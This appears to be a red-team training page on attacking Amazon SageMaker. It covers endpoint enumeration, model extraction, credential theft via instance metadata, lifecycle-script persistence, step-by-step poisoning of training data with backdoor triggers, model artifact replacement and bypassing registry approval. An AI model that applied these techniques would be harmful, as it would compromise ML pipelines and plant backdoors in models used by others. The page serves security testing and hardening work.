SageMaker Exploitation
Red team attack methodology for Amazon SageMaker: endpoint exploitation, notebook instance attacks, training job manipulation, model artifact tampering, and VPC misconfigurations in ML workloads.
SageMaker Exploitation
Amazon SageMaker provides the full ML lifecycle -- from data labeling and notebook-based development to distributed training, model hosting, and MLOps automation. This breadth creates a large attack surface. Unlike Bedrock where the model infrastructure is fully managed, SageMaker gives customers control over compute instances, container images, training scripts, and deployment configurations. Every point of customer control is a point of potential misconfiguration.
Endpoint Exploitation
Endpoint Enumeration
SageMaker endpoints host trained models for real-time inference. Each endpoint runs one or more model variants on dedicated compute instances.
# List all active endpoints
aws sagemaker list-endpoints --status-equals InService \
--query 'Endpoints[].{Name:EndpointName,Created:CreationTime}' --output table
# Get endpoint details
aws sagemaker describe-endpoint --endpoint-name <name>
# Get endpoint configuration (reveals instance types, model artifacts)
aws sagemaker describe-endpoint-config --endpoint-config-name <config-name>
# Get model details (reveals container image and model artifact location)
aws sagemaker describe-model --model-name <model-name>Model Extraction Through Inference
With sagemaker:InvokeEndpoint access, systematic querying can extract the model's behavior:
import boto3, json
client = boto3.client('sagemaker-runtime')
def query_endpoint(payload):
response = client.invoke_endpoint(
EndpointName='production-model',
ContentType='application/json',
Body=json.dumps(payload)
)
return json.loads(response['Body'].read())
# Systematic querying to map model behavior
# For classification models: query with crafted inputs to map decision boundaries
# For generative models: extract training data through targeted promptingEndpoint Exposure
SageMaker endpoints are accessed through the AWS API (HTTPS via the SageMaker runtime SDK). However, common misconfigurations expose them more broadly:
| Misconfiguration | Risk | Detection |
|---|---|---|
| Lambda proxy without auth | Public API Gateway routes to SageMaker | Check API Gateway configurations for SageMaker integrations |
| Overprivileged endpoint role | Endpoint IAM role with S3/DynamoDB access | Describe the endpoint execution role |
| Missing VPC endpoint policy | Any principal in the VPC can invoke | Check VPC endpoint policy for sagemaker.runtime |
| Cross-account access | Resource policies allowing external accounts | Review model and endpoint resource policies |
Notebook Instance Attacks
Notebook as Pivot Point
SageMaker notebook instances are Jupyter servers running on EC2 instances with an IAM role attached. They are commonly the weakest link in the ML pipeline because:
- Persistent compute with credentials: The notebook IAM role is accessible via the instance metadata service
- Development environment: Data scientists install arbitrary packages, download external data, and run untrusted code
- Network access: Notebooks often have access to both public internet and private VPC resources
- Long-lived: Notebooks frequently run for weeks or months without patching
Credential Theft
# From a compromised notebook instance
# Access the IAM role credentials
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>
# Check what the notebook role can do
aws sts get-caller-identity
aws iam list-attached-role-policies --role-name <notebook-role>
# Common notebook role overprivileges:
# - s3:* (access all training data, model artifacts)
# - sagemaker:* (full SageMaker control)
# - bedrock:* (invoke any model)
# - logs:* (read all CloudWatch logs)Lifecycle Configuration Attacks
SageMaker notebook lifecycle configurations run shell scripts on notebook start and creation. If an attacker can modify these scripts, they achieve persistent code execution:
# List lifecycle configurations
aws sagemaker list-notebook-instance-lifecycle-configs
# Get the script content
aws sagemaker describe-notebook-instance-lifecycle-config \
--notebook-instance-lifecycle-config-name <name>
# The script is base64-encoded. Decode to review:
# Look for credential handling, network configuration,
# package installations from untrusted sourcesNotebook Content Extraction
Notebooks (.ipynb files) stored on the instance or in connected Git repositories often contain:
- Database connection strings and credentials
- API keys for external services
- Training data samples
- Model architecture details and hyperparameters
- Internal service URLs and endpoints
- Data pipeline configurations
Training Job Manipulation
Training Data Access
Training jobs consume data from S3, EFS, or FSx. Identifying and accessing training data is a high-priority target:
# List recent training jobs
aws sagemaker list-training-jobs --sort-by CreationTime --sort-order Descending
# Get training job details including data source
aws sagemaker describe-training-job --training-job-name <name>
# Look for InputDataConfig[].DataSource.S3DataSource.S3Uri
# and OutputDataConfig.S3OutputPathTraining Pipeline Poisoning
Identify the training data source
From the training job configuration, extract the S3 URI containing training data. Check for write access to this bucket or prefix.
Understand the data format
Download sample training data to understand the format (CSV, JSON, JSONL, Parquet, etc.) and schema. The poisoned data must match this format exactly.
Craft poisoned data
Create data that introduces the desired model behavior. For classification models, inject mislabeled examples. For generative models, inject examples containing the target behavior (e.g., backdoor triggers).
Inject and trigger
Write poisoned data to the training S3 prefix. If training is scheduled, wait for the next run. If manual, social engineering or waiting for the next retraining cycle is required.
Training Container Attacks
SageMaker training jobs run in Docker containers. Organizations use either AWS-provided containers or custom containers from ECR. Custom container attacks:
- Container image tampering: Replace the training container in ECR with a modified version that exfiltrates training data or installs a backdoor in the trained model
- Dependency confusion: If the container installs packages at runtime, inject malicious packages through dependency confusion attacks
- Resource abuse: Training instances have GPU access; a compromised training container can use these GPUs for cryptocurrency mining or other compute-intensive attacks
Model Artifact Tampering
Artifact Storage
Trained models are stored as artifacts (typically model.tar.gz) in S3. The artifact contains model weights, configuration files, and sometimes inference code.
# Find model artifacts
aws sagemaker describe-model --model-name <name>
# Look for PrimaryContainer.ModelDataUrl
# Download and inspect
aws s3 cp s3://bucket/path/model.tar.gz .
tar xzf model.tar.gz
# Inspect model files, code/ directory, inference.pyModel Replacement
If write access to the model artifact S3 location is available, the production model can be replaced:
- Download the existing model artifact
- Modify the model (change weights, inject backdoor in inference code)
- Upload the modified artifact to the same S3 location
- The next endpoint update or deployment picks up the modified model
Model Registry Attacks
SageMaker Model Registry tracks model versions with approval workflows. Attack vectors:
- Approve unapproved models: If IAM allows
sagemaker:UpdateModelPackage, change model status fromPendingManualApprovaltoApproved - Register backdoored models: Register a new model version pointing to a tampered artifact
- Model group hijacking: Create model versions in existing model groups, potentially displacing legitimate models in automated pipelines
VPC Misconfigurations
Network Isolation Failures
SageMaker supports VPC deployment for network isolation, but common misconfigurations undermine it:
| Component | Misconfiguration | Impact |
|---|---|---|
| Notebook instances | Direct internet access enabled | Data exfiltration, C2 communication |
| Training jobs | No VPC configuration | Training data accessed over public internet |
| Endpoints | Public subnet with public IP | Endpoint accessible from the internet |
| VPC endpoints | Missing or overpermissive policies | Unauthorized service access within VPC |
Inter-Service Communication
SageMaker components communicate with other AWS services (S3, ECR, CloudWatch). Without VPC endpoints, this traffic traverses the public internet. With VPC endpoints but without restrictive policies, any principal in the VPC can access these services.
# Check if notebook has direct internet access
aws sagemaker describe-notebook-instance --notebook-instance-name <name>
# DirectInternetAccess: "Enabled" is a finding
# Check VPC endpoint policies
aws ec2 describe-vpc-endpoints \
--filters "Name=service-name,Values=com.amazonaws.*.sagemaker.runtime"Related Topics
- AWS AI Services Overview -- Service landscape and enumeration
- IAM for AI Services -- IAM patterns and misconfigurations
- Infrastructure & Supply Chain -- Supply chain attack techniques applicable to ML containers
- AI Cost & Billing Attacks -- GPU compute abuse through SageMaker
You have compromised a SageMaker notebook instance and extracted the IAM role credentials. Which action would provide the most persistent impact on the ML pipeline?
A SageMaker model artifact stored in S3 contains a code/ directory with inference.py. Why is write access to this S3 location a critical finding?
References
- SageMaker Security Documentation -- Official security best practices
- SageMaker Network Isolation -- VPC and network isolation guidance
- SageMaker Model Registry -- Model versioning and approval workflows